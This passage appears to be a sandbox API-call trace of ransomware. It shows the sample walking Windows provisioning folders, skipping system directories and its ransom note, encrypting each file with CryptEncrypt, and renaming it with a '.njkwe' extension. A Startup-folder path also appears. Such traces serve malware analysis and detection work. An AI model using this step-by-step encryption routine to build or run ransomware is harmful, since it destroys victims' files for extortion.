ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.288] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.288] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.288] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.288] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.288] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.288] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\..") returned 83 [0076.288] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.288] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.288] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x930c721b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x930c721b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x930c721b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x9ba5b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0076.288] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.288] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.288] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.288] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.288] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.288] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml") returned 99 [0076.288] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.288] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.288] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.288] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.289] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.289] GetTickCount () returned 0x115369d [0076.289] GetTickCount () returned 0x115369d [0076.289] GetTickCount () returned 0x115369d [0076.289] GetTickCount () returned 0x115369d [0076.289] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.289] GetProcessHeap () returned 0xbe0000 [0076.289] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.289] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0076.291] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.291] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0076.291] GetProcessHeap () returned 0xbe0000 [0076.291] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.291] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.291] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.295] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.295] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.296] CloseHandle (hObject=0x434) returned 1 [0076.296] GetProcessHeap () returned 0xbe0000 [0076.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.296] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.296] GetProcessHeap () returned 0xbe0000 [0076.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.296] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919d3d65, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x919d3d65, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x919d3d65, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0076.296] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.296] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.296] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.297] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.297] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.297] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml") returned 100 [0076.297] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.297] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.297] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.297] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.297] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.297] GetTickCount () returned 0x11536ac [0076.297] GetTickCount () returned 0x11536ac [0076.297] GetTickCount () returned 0x11536ac [0076.297] GetTickCount () returned 0x11536ac [0076.297] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.297] GetProcessHeap () returned 0xbe0000 [0076.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.297] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.298] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.298] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.298] GetProcessHeap () returned 0xbe0000 [0076.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.298] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.298] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.299] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.300] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.300] CloseHandle (hObject=0x434) returned 1 [0076.300] GetProcessHeap () returned 0xbe0000 [0076.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.300] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.300] GetProcessHeap () returned 0xbe0000 [0076.300] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.300] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.300] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.300] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.300] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.300] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.301] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.301] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov") returned 85 [0076.301] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.301] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.301] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.301] GetProcessHeap () returned 0xbe0000 [0076.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.301] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\*") returned 87 [0076.301] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0076.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.301] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\.") returned 87 [0076.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.301] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.301] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.301] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.301] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\..") returned 88 [0076.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.301] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x2270dc88, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x2270dc88, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.301] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.302] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.302] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.302] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.302] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.302] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime") returned 93 [0076.302] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.302] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.302] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.302] GetProcessHeap () returned 0xbe0000 [0076.302] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.302] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\*") returned 95 [0076.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x2270dc88, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x2270dc88, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0076.305] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.305] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.305] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.305] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.305] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.305] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\.") returned 95 [0076.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.305] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b6e507, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x2270dc88, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x2270dc88, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.307] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.307] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.307] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.307] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.307] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.307] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\..") returned 96 [0076.307] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.307] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.307] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a4472, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x900a4472, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x900ca6de, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="0__CON~1.PRO")) returned 1 [0076.307] lstrcmpiW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.307] lstrcmpiW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.307] lstrcmpiW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.307] lstrcmpiW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.307] lstrcmpiW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.307] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml") returned 182 [0076.307] StrStrIW (lpFirst="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.307] lstrcmpW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.307] lstrcmpW (lpString1="0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.307] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connection", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.307] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\0__connections_cellular_albanian mobile communications (albania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.308] GetTickCount () returned 0x11536ac [0076.308] GetTickCount () returned 0x11536ac [0076.308] GetTickCount () returned 0x11536ac [0076.308] GetTickCount () returned 0x11536ac [0076.308] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.308] GetProcessHeap () returned 0xbe0000 [0076.308] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.308] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0076.309] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.309] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0076.309] GetProcessHeap () returned 0xbe0000 [0076.309] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.309] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.310] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.310] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, 